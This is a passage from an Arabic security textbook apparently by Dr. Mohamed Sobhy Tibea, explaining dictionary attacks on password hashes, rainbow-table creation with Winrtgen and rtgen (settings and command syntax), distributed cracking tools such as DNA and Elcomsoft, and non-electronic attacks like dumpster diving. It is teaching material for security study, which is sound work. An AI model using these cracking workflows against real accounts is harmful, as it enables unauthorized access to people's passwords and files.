‫ﯾﺟب أن ﯾﺗم ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺷﻔرة ﻓﻘط ﻓﻲ ﻣﻠف ﯾﺣﺗوي ﻋﻠﻰ اﺳم اﻟﻣﺳﺗﺧدم ‪ /‬ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﺷﻔرة‪ .‬ﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ‬
‫أﺛﻧﺎء ﻋﻣﻠﯾﺔ ﺗﺳﺟﯾل اﻟدﺧول ﯾﺗم ﺗﺷﻔﯾرھﺎ ﺑﺎﺳﺗﺧدام وظﯾﻔﺔ اﻟﮭﺎش ﻟﻠﺗﺷﻔﯾر‪ ،‬وﯾﺗم ﺑﻌد ذﻟك ﻣﻘﺎرﻧﺔ ﻣﻊ ﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﺗم ﺗﺧزﯾﻧﮭﺎ ﻓﻲ اﻟﻣﻠف‪.‬‬
‫ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺷﻔرة اﻟﺗﻲ ﯾﺗم ﺗﺧزﯾﻧﮭﺎ ﯾﻣﻛﻧﮭﺎ اﺛﺑﺎت اﻧﮭﺎ ﻋدﯾﻣﺔ اﻟﺟدوى ﺿد ھﺟﻣﺎت اﻟﻘﺎﻣوس)‪ . (dictionary attacks‬إذا ﻛﺎن اﻟﻣﻠف‬
‫اﻟذي ﯾﺣﺗوي ﻋﻠﻰ ﻛﻠﻣﺔ ﻣرور اﻟﻣﺷﻔرة ﻓﻲ ﺷﻛل ﻣﻘروء‪ ،‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم ﺑﺳﮭوﻟﺔ اﻛﺗﺷﺎف وظﯾﻔﺔ اﻟﮭﺎش‪ .‬وﻣن ﺛم ﯾﻣﻛﻧﮫ ﻓك ﺗﺷﻔﯾر ﻛل اﻟﻛﻠﻣﺎت‬
‫اﻟﻣوﺟودة ﻓﻲ اﻟﻘﺎﻣوس ﺑﺎﺳﺗﺧدام داﻟﺔ اﻟﮭﺎش‪ ،‬وﻣن ﺛم ﻣﻘﺎرﻧﺗﮭﺎ ﻣﻊ ﻛﻠﻣﺔ اﻟﻣرور ﻣﺷﻔرة‪ .‬وﺑﺎﻟﺗﺎﻟﻲ ﻓﺎن اﻟﻣﮭﺎﺟم ﯾﺣﺻل ﻋﻠﻰ ﺟﻣﯾﻊ ﻛﻠﻣﺎت اﻟﺳر‬
‫اﻟﺗﻲ ھﻲ ﻋﺑﺎرة ﻋن ﻛﻠﻣﺎت ﻣدرﺟﺔ ﻓﻲ اﻟﻘﺎﻣوس‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪329‬‬

‫ﺗﺧزﯾن اﻟﮭﺎش ﯾﺗطﻠب ﻣﺳﺎﺣﺔ ذاﻛرة ﻛﺑﯾرة ﻣﺛل ‪ LM hash‬واﻟذي ﯾﺣﺗﺎج ‪ 310‬ﺗﯾراﺑﺎﯾت وﻛذﻟك ‪ 15> NT hash‬ﺣرف ﯾﺗطﻠب‬
‫‪ 5652897009‬إﻛﺳﺎ ﺑﺎﯾت‪ .‬اﺳﺗﺧدام ﺗﻘﻧﯾﺔ ‪ time-space tradeoff technique‬وذﻟك ﻟﻠﺣد ﻣن ﻣﺳﺎﺣﺔ اﻟذاﻛرة اﻟﻣطﻠوﺑﺔ ﻟﺗﺧزﯾن اﻟﮭﺎش‪.‬‬

‫‪Tools to Create Rainbow Tables: Winrtgen and Rtgen‬‬

‫اﻟﻣﮭﺎﺟﻣﯾن ﯾﻘوﻣوا ﺑﺈﻧﺷﺎء ﺟداول ‪ Rainbow Tables‬ﺑﺎﺳﺗﺧدام اﻷدوات اﻟﺗﺎﻟﯾﺔ‪:‬‬


‫‪Winrtgen‬‬

‫اﻟﻣﺻدر‪http://www.oxid.it/projects.html :‬‬
‫‪ Winrtgen‬ھو اداه رﺳوﻣﯾﺔ ﻷﻧﺷﺎء ﺟداول ‪ Rainbow Tables‬واﻟﺗﻲ ﺗﺳﺎﻋد اﻟﻣﮭﺎﺟﻣﯾن ﺣﯾث ﻣن ﺧﻼﻟﮭﺎ ﯾﻣﻛن ﻛﺳر ھﺎش ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬
‫وھو ﯾدﻋم اﻟﮭﺎﺷﺎت اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫‪LM, FastLM, NTLM, LMCHALL, HalfLMCHALL, NTLMCHALL, MSCACHE, MD2, MD4, MD5,‬‬
‫‪SHA1, RIPEMD160, MySQL323, MySQLSHA1, CiscoPIX, ORACLE, SHA-2 (256), SHA-2 (384) and‬‬
‫‪SHA-2 (512) hashes‬‬
‫طرﯾﻘﺔ اﻟﻌﻣل‪:‬‬
‫‪ -1‬ﻧﻘوم ﺑﺎﻟﻧﻘر اﻟﻣزدوج ﻋﻠﻰ ﺗطﺑﯾﻖ اﻟﺑرﻧﺎﻣﺞ ‪ Winrtgen.exe‬ﻓﺗظﮭر اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪ -2‬ﻧﻧﻘر ﻓوق ‪ Add Table‬ﻓﺗظﮭر اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪330‬‬

‫‪ -3‬ﻓﻲ اﻟﺷرﯾط اﻟﻌﻠوي ﻋﻧد اﻟﻘﯾم ‪ HASH‬ﻧﺟد اﻧﮭﺎ ﺗﺣﺗوي ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﺑﺎﻟﮭﺎش اﻟذي ﯾدﻋﻣﮫ ﻓﻲ ﻣﺛﺎﻟﻧﺎ ھذا ﺳو ﻧﺧﺗﺎر‪ ntlm‬ﺛم ﺗﺣت‬
‫اﻟﻌﻧوان ‪ Min Len‬واﻟﺗﻲ ﺗﻌﺑر ﻋن اﻗل طول ﻟﻠﮭﺎش ﻧﺧﺗﺎر‪ 4‬و‪ Max Len‬ﻧﺧﺗﺎر ‪ 9‬اﻣﺎ ﺗﺣت ‪ chain count‬ﻧﺧﺗﺎر ‪.4000000‬‬
‫‪ -4‬ﻓﻲ اﻟﺧﺎﻧﺔ اﻟﻣﻘﺎﺑﻠﺔ ﻟﻠﻌﻧوان ‪ Charset‬ﻧﺧﺗﺎر ‪ loweralpha‬واﻟﺗﻲ ﺗﻌﻧﻰ اﻟﺣروف اﻟﺻﻐﯾرة وھذا ﻋﻠﻰ ﺣﺳب ﻧوع ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬

‫‪ -5‬ﺛم ﻧﻧﻘر ﻓوق ‪ ok‬ﻹﻧﺷﺎء اﻟﻣﻠف‪.‬‬

‫‪ -6‬ﺛم ﻧﻧﻘر ﻓوق ‪ ok‬ﻹﻧﺷﺎء اﻟﻣﻠف‪.‬‬


‫‪ -7‬اﻧﺷﺎء ﺟدول اﻟﮭﺎش ﺳوف ﯾﺄﺧذ ﺑﻌض ﻣن اﻟوﻗت اﻋﺗﻣﺎدا ﻋﻠﻰ اﺧﺗﯾﺎرك ﻟﻧوع ‪ hash‬و‪.charset‬‬
‫‪Rtgen‬‬

‫اﻟﻣﺻدر‪http://www.project-rainbowcrack.com :‬‬
‫‪ Rainbowcrack‬ھو ﺗﻧﻔﯾذ ﻻﻗﺗراح ﻋﺎم واﻟذى ﯾﺳﺗﻔﯾد ﻣن ﺗﻘﻧﯾﺔ ‪ time-memory trade-off technique‬ﻟﻛﺳر اﻟﮭﺎش‪ .‬ﯾﺳﻣﺢ ھذا‬
‫اﻟﻣﺷروع ﻟك ﻛﺳر ھﺎش ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ﯾﺗم اﺳﺗﺧدام أداة ‪ rtgen‬اﻟﻣﺗوﻓرة ﻓﻲ ھذا اﻟﻣﺷروع ﻟﺗوﻟﯾد ﺟداول ‪ .Rainbow table‬ﯾﺣﺗﺎج ‪rtgen‬‬
‫اﻟﻌدﯾد ﻣن اﻟﻣﻌﺎﻣﻼت ﻟﺗوﻟﯾد ﺟدول ‪Rainbow table‬؛ ﯾﻣﻛﻧك اﺳﺗﺧدام ﺑﻧﺎء اﻟﺟﻣﻠﺔ اﻟﺗﺎﻟﻲ ﻣن ﺳطر اﻷواﻣر ﻟﺗوﻟﯾد ﺟداول ‪:Rainbow table‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪331‬‬

‫ھذا اﻟﺗطﺑﯾﻖ ﻟﻧظﺎﻣﻲ اﻟﺗﺷﻐﯾل ﻟﯾﻧﻛس ووﯾﻧدوز‪ .‬اﻟﺻﯾﻐﺔ اﻟﻌﺎﻣﺔ ﻟﺳطر اﻷواﻣر ﻛﺎﻻﺗﻰ‪:‬‬
‫‪#rtgen©hash_algorithm©charset©plaintext_len_min©plaintext_len_max©table_index©chain_len‬‬
‫‪chain_num©part_index‬‬

‫‪Offline Attack: Distributed Network Attacks‬‬


‫)‪ Distributed Network Attack (DNA‬ھﻲ اﻟﺗﻘﻧﯾﺔ اﻟﻣﺳﺗﺧدﻣﺔ ﻻﺳﺗﻌﺎدة اﻟﻣﻠﻔﺎت اﻟﻣﺣﻣﯾﺔ ﺑﻛﻠﻣﺔ ﻣرور‪ .‬ﺣﯾث إﻧﮫ ﯾﺳﺗﺧدم ﻗوة‬
‫اﻟﻣﻌﺎﻟﺟﺔ اﻟﻐﯾر ﻣﺳﺗﺧدﻣﺔ ﻣن اﻵﻻت ﻋﺑر اﻟﺷﺑﻛﺔ ﻟﻔك ﺗﺷﻔﯾر ﻛﻠﻣﺎت اﻟﺳر‪ .‬ﻓﻲ ھذا اﻟﮭﺟوم‪ ،‬ﺗم ﺗﺛﺑﯾت ‪ DNA manager‬ﻓﻲ ﻣوﻗﻊ ﻣرﻛزي‬
‫ﺣﯾث ﯾﻣﻛن ﻟﻶﻻت اﻟذﯾن ﯾﻘوﻣون ﺑﺗﺷﻐﯾل ‪ DNA client‬ﯾﻣﻛﻧﮭم اﻟوﺻول إﻟﯾﮫ ﻋﺑر اﻟﺷﺑﻛﺔ‪ DNA manager .‬ﯾﻧﺳﻖ اﻟﮭﺟوم‪ ،‬ﺗﻛﻠﯾف ﺟزء‬
‫ﺻﻐﯾر ﻣن ‪ key search‬ﻟﻶﻻت ﺣﺗﻰ ﯾﻛون ﺗوزﯾﻊ اﻟﻌﻣل ﻓﻲ ﺟﻣﯾﻊ اﻟﻣﻌﺎﻟﺟﺎت ﻓﻲ ﺟﻣﯾﻊ أﻧﺣﺎء اﻟﺷﺑﻛﺔ‪ .‬ﯾدار ‪ DNA client‬ﻓﻲ اﻟﺧﻠﻔﯾﺔ‪،‬‬
‫ﺣﯾث ﯾﺳﺗﺧدم ﻓﻘط اﻟﺟزء اﻟﻐﯾر ﻣﺳﺗﺧدم ﻣن اﻟﻣﻌﺎﻟﺞ‪ .‬اﻟﺑرﻧﺎﻣﺞ ﯾﺟﻣﻊ ﺑﯾن ﻗدرات اﻟﻣﻌﺎﻟﺞ ﻟﻛﺎﻓﺔ أﺟﮭزة اﻟﻌﻣﻼء اﻟﻣﺗﺻﻠﺔ ﺑﺎﻟﺷﺑﻛﺔ وﯾﺳﺗﺧدﻣﮭﺎ‬
‫ﻹﺟراء ﺑﺣث رﺋﯾﺳﯾﺔ ﻋﻠﻰ ‪ Office 97‬و‪ 2000‬ﻟﻔك ﺗﺷﻔﯾرھم‪.‬‬
‫ﻣﻣﯾزات ‪:DNA‬‬
‫‪ -‬ﯾﻘرأ اﻹﺣﺻﺎءات واﻟرﺳوم اﻟﺑﯾﺎﻧﯾﺔ ﺑﺳﮭوﻟﺔ‬
‫‪ -‬ﯾﺿﯾف ﻗواﻣﯾس اﻟﻣﺳﺗﺧدم ﻟﻛﺳر ﻛﻠﻣﺔ اﻟﺳر‬
‫‪ -‬ﯾﺣﺳن ھﺟﻣﺎت ﻛﻠﻣﺔ اﻟﻣرور ﻟﻠﻐﺎت ﻣﻌﯾﻧﺔ‬
‫‪ -‬ﯾﻌدل ﻗواﻣﯾس اﻟﻣﺳﺗﺧدم‬
‫‪ -‬ﯾﺿم وظﯾﻔﺔ ‪.stealth client installation‬‬
‫‪ -‬ﯾﻘوم ﺑﺎﻟﺗﺣدﯾث اﻟﺗﻠﻘﺎﺋﻲ ﻟﻠﻌﻣﯾل أﺛﻧﺎء ﺗﺣدﯾث ﺧﺎدم ‪.DNA‬‬
‫‪ -‬ﺗﺳﯾطر ﻋﻠﻰ اﻟﻌﻣﻼء وﺗﺣدد اﻟﻌﻣل اﻟذي ﯾﻘوم ﺑﮫ اﻟﻌﻣﻼء‪.‬‬

‫ﻧﺟد ان ‪ DNA‬ﯾﻧﻘﺳم اﻟﻰ وﺣدﺗﯾن )‪ (2Module‬ﻛﺎﻻﺗﻰ‪:‬‬


‫‪DNA Server Interface -1‬‬
‫واﺟﮭﺔ ﺧﺎدم ‪ (DNA Server Interface) DNA‬ﯾﺳﻣﺢ ﻟﻠﻣﺳﺗﺧدﻣﯾن ﻹدارة ‪ DNA‬ﻣن ﺧﺎدم‪ .‬ﺗوﻓر وﺣدة ﺧﺎدم ‪(DNA Server Module) DNA‬‬
‫ﻟﻠﻣﺳﺗﺧدم وﺿﻊ ﺟﻣﯾﻊ اﻟوظﺎﺋف اﻟﺗﻲ ﯾﻘوم ‪ DNA‬ﺑﺗﻧﻔﯾذھﺎ‪ .‬وﺗﻧﻘﺳم ھذه اﻟواﺟﮭﺔ إﻟﻰ‪:‬‬

‫اﻟوظﺎﺋف اﻟﺣﺎﻟﯾﺔ)‪ : (Current jobs‬ھﻲ ﻋﺑﺎره ﻋن ﻗﺎﺋﻣﺔ اﻧﺗظﺎر ﻟﺟﻣﯾﻊ اﻟوظﺎﺋف اﻟﺣﺎﻟﯾﺔ اﻟﺗﻲ ﺗم إﺿﺎﻓﺗﮭﺎ ﻣن ﻗﺑل وﺣدة ﺗﺣﻛم‪ .‬ﻗﺎﺋﻣﺔ‬
‫اﻟوظﺎﺋف اﻟﺣﺎﻟﯾﺔ )‪ (Current jobs list‬ﻟدﯾﮭﺎ اﻟﻌدﯾد ﻣن اﻷﻋﻣدة‪ ،‬ﻣﺛل رﻗم اﻟﮭوﯾﺔ )‪ (ID‬اﻟﺗﻲ ﺗم ﺗﻌﯾﯾﻧﮭﺎ ﻣن ﻗﺑل ‪ DNA‬ﻟﻛل وظﯾﻔﺔ‪ ،‬واﺳم‬
‫اﻟﻣﻠف اﻟﻣﺷﻔر‪ ،‬وﻛﻠﻣﺔ اﻟﺳر اﻟﺗﻲ ﺗم اﺳﺗﺧداﻣﮭﺎ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم‪ ،‬وﻛﻠﻣﺔ اﻟﺳر اﻟﺗﻲ ﺗطﺎﺑﻖ اﻟﻣﻔﺗﺎح اﻟذي ﯾﻣﻛن أن ﯾﻔﺗﺢ اﻟﺑﯾﺎﻧﺎت‪ ،‬ووﺿﻊ ھذه‬
‫اﻟﻣﮭﻣﺔ‪ ،‬وأﻋﻣدة أﺧرى ﻣﺧﺗﻠﻔﺔ‪.‬‬
‫اﻟوظﺎﺋف اﻟﻣﻧﺗﮭﯾﺔ )‪ :(Finished jobs‬ﺗوﻓر ﻗﺎﺋﻣﺔ اﻟوظﺎﺋف اﻟﻣﻧﺗﮭﯾﺔ )‪ (Finished jobs list‬اﻟﻣﻌﻠوﻣﺎت ﺣول اﻟوظﺎﺋف اﻟﺗﻲ ﯾﻣﻛن ﻓك‬
‫ﺗﺷﻔﯾرھﺎ ﺑﻣﺎ ﻓﻲ ذﻟك ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ﻗﺎﺋﻣﺔ اﻟوظﺎﺋف اﻟﻣﻧﺗﮭﯾﺔ ﻟدﯾﮫ أﯾﺿﺎ اﻟﻌدﯾد ﻣن اﻷﻋﻣدة اﻟﺗﻲ ﺗﺷﺑﮫ ﻗﺎﺋﻣﺔ اﻟوظﺎﺋف اﻟﺣﺎﻟﯾﺔ‪ .‬ﺗﺷﻣل ھذه اﻷﻋﻣدة‬
‫اﻟرﻗم اﻟﺗﻌرﯾﻔﻲ اﻟﻣﻌﯾن ﻣن ﻗﺑل ‪ DNA‬ﻟﮭذه اﻟوظﯾﻔﺔ‪ ،‬واﺳم اﻟﻣﻠف اﻟﻣﺷﻔر‪ ،‬ﻣﺳﺎر ﻓك اﻟﻣﻠف‪ ،‬واﻟﻣﻔﺗﺎح اﻟﻣﺳﺗﺧدم ﻓﻲ اﻟﺗﺷﻔﯾر وﻓك‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪332‬‬

‫ﺗﺷﻔﯾر اﻟﻣﻠف‪ ،‬اﻟﺗﺎرﯾﺦ واﻟوﻗت اﻟذي اﺗﺧذه ﺧﺎدم ‪ DNA‬ﻟﻠﻌﻣل ﻋﻠﻰ اﻟوظﯾﻔﺔ‪ ،‬اﻟﺗﺎرﯾﺦ واﻟوﻗت اﻟذي اﺗﺧذه ﺧﺎدم ‪ DNA‬ﻟﻼﻧﺗﮭﺎء ﻣن اﻟﻌﻣل ﻋﻠﻰ‬
‫وظﯾﻔﺔ‪ ،‬واﻟوﻗت اﻟﻣﻧﻘﺿﻰ‪ ،‬اﻟﺦ‪.‬‬

‫‪DNA Client Interface -2‬‬


‫واﺟﮭﺔ ﻋﻣﯾل ‪ (DNA Client Interface) DNA‬ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻣن اﻟﻌدﯾد ﻣن ﻣﺣطﺎت اﻟﻌﻣل)‪ .(workstation‬إﺣﺻﺎءات اﻟﻌﻣﯾل ﯾﻣﻛن‬
‫ﺗﻧﺳﯾﻘﮭﺎ ﺑﺳﮭوﻟﺔ ﺑﺎﺳﺗﺧدام واﺟﮭﺔ ﻋﻣﯾل ‪ .DNA‬ﺗﺗوﻓر ھذه اﻟواﺟﮭﺔ ﻋﻠﻰ اﻷﺟﮭزة ﺣﯾث ﺗم ﺗﺛﺑﯾت ﺗطﺑﯾﻖ اﻟﻌﻣﯾل ‪ .DNA‬ھﻧﺎك اﻟﻌدﯾد ﻣن‬
‫اﻟﻌﻧﺎﺻر اﻟﺗﻲ ﺗﺣﺗوﯾﮭﺎ ﻣﺛل اﺳم ﻋﻣﯾل ‪ ،DNA‬اﺳم اﻟﻣﺟﻣوﻋﺔ اﻟﺗﻲ ﯾﻧﺗﻣﻲ إﻟﯾﮭﺎ ﻋﻣﯾل ‪ ،DNA‬وإﺣﺻﺎءات ﻋن اﻟوظﯾﻔﺔ اﻟﺣﺎﻟﯾﺔ)‪، (current job‬‬
‫واﻟﻌدﯾد ﻣن اﻟﻣﻛوﻧﺎت اﻷﺧرى‪.‬‬
‫إدارة اﻟﺸﺒﻜﺔ‬
‫ﺗطﺑﯾﻖ رﺻد ﺣرﻛﺔ ﻣرور اﻟﺷﺑﻛﺔ )‪ (The Network Traffic application‬ﯾﺳﺗﺧدم ﻓﻲ وﯾﻧدوز ﻟﻐرض إدارة اﻟﺷﺑﻛﺔ‪ .‬ﻣرﺑﻊ اﻟﺣوار‬
‫ﺣرﻛﺔ ﻣرور اﻟﺷﺑﻛﺔ )‪ (The Network Traffic dialog box‬ﯾﺳﺗﺧدم ﻟﻣﻌرﻓﺔ ﺳرﻋﺔ اﻟﺷﺑﻛﺔ اﻟﺗﻲ ﯾﺳﺗﺧدﻣﮭﺎ ‪ DNA‬وﻛل طول وﺣدة‬
‫ﻋﻣل )‪ (work unit length‬ﻣن ‪ .DNA Client‬ﺑﺎﺳﺗﺧدام طول وﺣدة اﻟﻌﻣل)‪ ، (work unit length‬ﯾﻣﻛن ﻟﻌﻣﯾل ‪ DNA‬ان ﯾﻌﻣل ﻣن‬
‫دون اﻻﺗﺻﺎل ﺑﺧﺎدم ‪ .DNA‬ﺗطﺑﯾﻖ ‪ DNA Client‬ﻟدﯾﮫ اﻟﻘدرة ﻋﻠﻰ اﻻﺗﺻﺎل ﺑﺧﺎدم ‪ DNA‬ﻓﻲ ﺑداﯾﺔ وﻧﮭﺎﯾﺔ طول وﺣدة اﻟﻌﻣل‪ .‬ﯾﻣﻛن‬
‫ﻟﻠﻣﺳﺗﺧدم ﻣراﻗﺑﺔ ﺣﺎﻟﺔ ﻗﺎﺋﻣﺔ اﻧﺗظﺎر اﻟﻌﻣل و‪ .DNA‬ﻋﻧدﻣﺎ ﯾﺗم ﺟﻣﻊ اﻟﺑﯾﺎﻧﺎت ﻣن ﻣرﺑﻊ ﺣوار ﺣرﻛﺔ ﻣرور اﻟﺷﺑﻛﺔ‪ ،‬ﯾﻣﻛن إﺟراء ﺗﻌدﯾل ﻋﻠﻰ‬
‫وﺣدة اﻟﻌﻣل اﻟﺧﺎﺻﺔ ﺑﺎﻟﻌﻣﯾل‪ .‬ﻋﻧدﻣﺎ ﯾزداد ﺣﺟم طول وﺣدة اﻟﻌﻣل )‪ (work unit length‬ﻓﺎن ﺳرﻋﺔ ﺣرﻛﺔ ﻣرور اﻟﺷﺑﻛﺔ ﺗﻘل‪ .‬إذا ﺗم‬
‫ﺧﻔض ﺣرﻛﺔ اﻟﻣرور‪ ،‬ﻓﺈن ﻋﻣل ﺟﮭﺎز اﻟﻌﻣﯾل ﻋﻠﻰ اﻟوظﺎﺋف ﯾﺗطﻠب ﻗدرا أطول ﻣن اﻟوﻗت‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﯾﻣﻛن أن ﺗﻛون اﻟطﻠﺑﺎت اﻟﺗﻲ ﺗﻘدم إﻟﻰ‬
‫اﻟﻣﻠﻘم أﻗل ﺑﺳﺑب اﻧﺧﻔﺎض ﺣرﻛﺔ ﻣرور اﻟﺷﺑﻛﺔ‪.‬‬
‫‪Elcomsoft Distributed Password Recovery‬‬

‫اﻟﻣﺻدر‪http://www.elcomsoft.com :‬‬
‫‪ Elcomsoft Distributed Password Recovery‬ﯾﺳﻣﺢ ﻟك ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﻌﻘدة ‪ ،‬واﺳﺗﻌﺎدة ﻣﻔﺎﺗﯾﺢ اﻟﺗﺷﻔﯾر اﻟﻘوﯾﺔ ‪ ،‬و ﻓﺗﺢ‬
‫اﻟﻣﺳﺗﻧدات ﻓﻲ ﺑﯾﺋﺔ اﻹﻧﺗﺎج‪ .‬ﻷﻧﮭﺎ ﺗﺗﯾﺢ ﺗﻧﻔﯾذ اﻛواد ﻣﻛﺛﻔﺔ ﺣﺳﺎﺑﯾﺎ ﻻﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر اﻟﻣوازﯾﺔ ﺣﺳﺎﺑﯾﺎ ﺑﺷﻛل ﻛﺑﯾر ﻟﻠﻌﻧﺎﺻر اﻟﻣوﺟودة ﻓﻲ‬
‫ﻣﺳرﻋﺎت اﻟرﺳوﻣﺎت اﻟﺣدﯾﺛﺔ‪ .‬ھذه اﻟﺗﻘﻧﯾﺔ ﻣﺑﺗﻛرة ﻟﺗﺳرﯾﻊ اﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر ﻋﻧد وﺟود ﺑطﺎﻗﺔ رﺳوﻣﯾﮫ ‪ ATI‬أو ‪ NVIDIA‬ﻣوﺟودة وﻣﺗواﻓﻘﺔ‬
‫ﺑﺎﻹﺿﺎﻓﺔ ﻣﻊ وﺿﻊ وﺣدة اﻟﻣﻌﺎﻟﺟﺔ اﻟﻣرﻛزي ﻓﻘط‪ .‬ﺑﺎﻟﻣﻘﺎرﻧﺔ ﻣﻊ طرق اﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر اﻟﺗﻲ ﺗﺳﺗﺧدم ﻓﻘط وﺣدة اﻟﻣﻌﺎﻟﺟﺔ اﻟﻣرﻛزﯾﺔ اﻟرﺋﯾﺳﯾﺔ‬
‫ﻟﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ ،‬وﺗﺳرﯾﻊ ‪ GPU‬اﻟﻣﺳﺗﺧدﻣﺔ ﻣن ﻗﺑل ھذه اﻟﺗﻛﻧوﻟوﺟﯾﺎ ﯾﺟﻌل اﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر ﺑﺷﻛل أﺳرع‪ .‬ھذا ﯾدﻋم اﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر‬
‫ﻟﻣﺟﻣوﻋﺔ ﻣﺗﻧوﻋﺔ ﻣن اﻟﺗطﺑﯾﻘﺎت وﺗﻧﺳﯾﻘﺎت اﻟﻣﻠﻔﺎت‪.‬‬
‫ﻣﻠﺣوظﮫ‪ :‬ھذا اﻟﺗطﺑﯾﻖ ھو ﻣﺛﺎل ‪ Distributed Network Attacks‬وﻟﻛن ﺑﺎﻹﺿﺎﻓﺔ اﻟﻰ اﻋﺗﻣﺎده ﻋﻠﻰ وﺣدة اﻟﻣﻌﺎﻟﺞ اﻟﻣرﻛزي ﻓﺎﻧﮫ‬
‫ﯾﻌﺗﻣد ﻋﻠﻰ ﻣﻌﺎﻟﺞ ﻛروت اﻟﺷﺎﺷﺔ اﻟﺣدﯾﺛﺔ ‪ GPU‬أﯾﺿﺎ‪.‬‬
‫اﻟﻣﯾزات‪ :‬ﻓواﺋد‬
‫‪ -1‬ﯾﻘﻠل ﻣن اﻟوﻗت اﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر‪.‬‬
‫‪ Distributed password recovery -2‬ﻋﻠﻰ ‪ ،LAN‬اﻹﻧﺗرﻧت‪ ،‬أو ﻛﻠﯾﮭﻣﺎ‪.‬‬
‫‪ Solace management -3‬ﻟﺳﮭوﻟﺔ اﻟﺳﯾطرة ﻣن أي ﺟﮭﺎز ﻛﻣﺑﯾوﺗر ﻣﺗﺻل ﺑﺎﻟﺷﺑﻛﺔ‪.‬‬
‫‪ Plug-in architecture -4‬ﯾﺳﻣﺢ ﻟﺗﻧﺳﯾﻘﺎت اﻟﻣﻠﻔﺎت إﺿﺎﻓﯾﺔ‪.‬‬
‫‪ -5‬اﻟﺗﺣﻛم اﻟﻣرن ﻓﻲ ﻗﺎﺋﻣﺔ اﻻﻧﺗظﺎر ﯾﺗﯾﺢ إدارة اﻟوظﺎﺋف ﺑﺳﮭوﻟﮫ‪.‬‬
‫‪ -6‬ﺗﺛﺑﯾت وإزاﻟﺔ ﻋﻣﻼء اﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر ﻋن ﺑﻌد‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪333‬‬

‫‪Non-Electronic Attacks‬‬

‫اﻟﮭﺟﻣﺎت ﻏﯾر اﻹﻟﻛﺗروﻧﯾﺔ ‪ Non-Electronic Attacks‬ﯾطﻠﻖ ﻋﻠﯾﮭﺎ أﯾﺿﺎ ھﺟﻣﺎت ﻏﯾر ﺗﻘﻧﯾﺔ‪ . Non-Technical Attacks‬ھذا اﻟﻧوع‬
‫ﻣن اﻟﮭﺟﻣﺎت ﻻ ﯾﺗطﻠب أي ﻣﻌرﻓﺔ ﺗﻘﻧﯾﺔ ﺣول طرق اﻟﺗدﺧل ﻣﻊ ﻧظﺎم آﺧر‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻓﺈﻧﮫ ﯾدﻋﻰ ھﺟوم ﻏﯾر إﻟﻛﺗروﻧﯾﺔ‪ .‬ھﻧﺎك أرﺑﻌﺔ أﻧواع ﻣن‬
‫اﻟﮭﺟﻣﺎت ﻏﯾر اﻹﻟﻛﺗروﻧﯾﺔ‪ ،‬واﻟﺗﻲ ھﻲ‪(Dumpster Diving، Keyboard Sniffing، Shoulder Surfing،Social Engineering) :‬‬

‫‪ Dumpster Diving‬ھو وﺳﯾﻠﺔ اﻟﮭﺟوم اﻟرﺋﯾﺳﯾﺔ اﻟﺗﻲ ﺗﺳﺗﮭدف ﺑﻧﺎ ًء ﻋﻠﻰ ﻓﺷل ﻛﺑﯾر ﻓﻲ أﻣن اﻟﻛﻣﺑﯾوﺗر‪ :‬اﻟﻣﻌﻠوﻣﺎت اﻟﻣﮭم ﺟدا اﻟذى ﯾﺳﻌﻰ‬
‫اﻟﻧﺎس ﻟﺣﻣﺎﯾﺗﮭﺎ واﻣﻧﮭﺎ ‪ ،‬ﯾﻣﻛن اﻟﺣﺻول ﻋﻠﯾﮭﺎ ﻣن ﻗﺑل أي ﺷﺧص ﺗﻘرﯾﺑﺎ ﻋﻠﻰ اﺳﺗﻌداد ﻟﻠﺗدﻗﯾﻖ ﻓﻲ اﻟﻘﻣﺎﻣﺔ‪ .‬ﻓﺈﻧﮫ ﯾﺳﻣﺢ ﻟك ﺑﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت‬
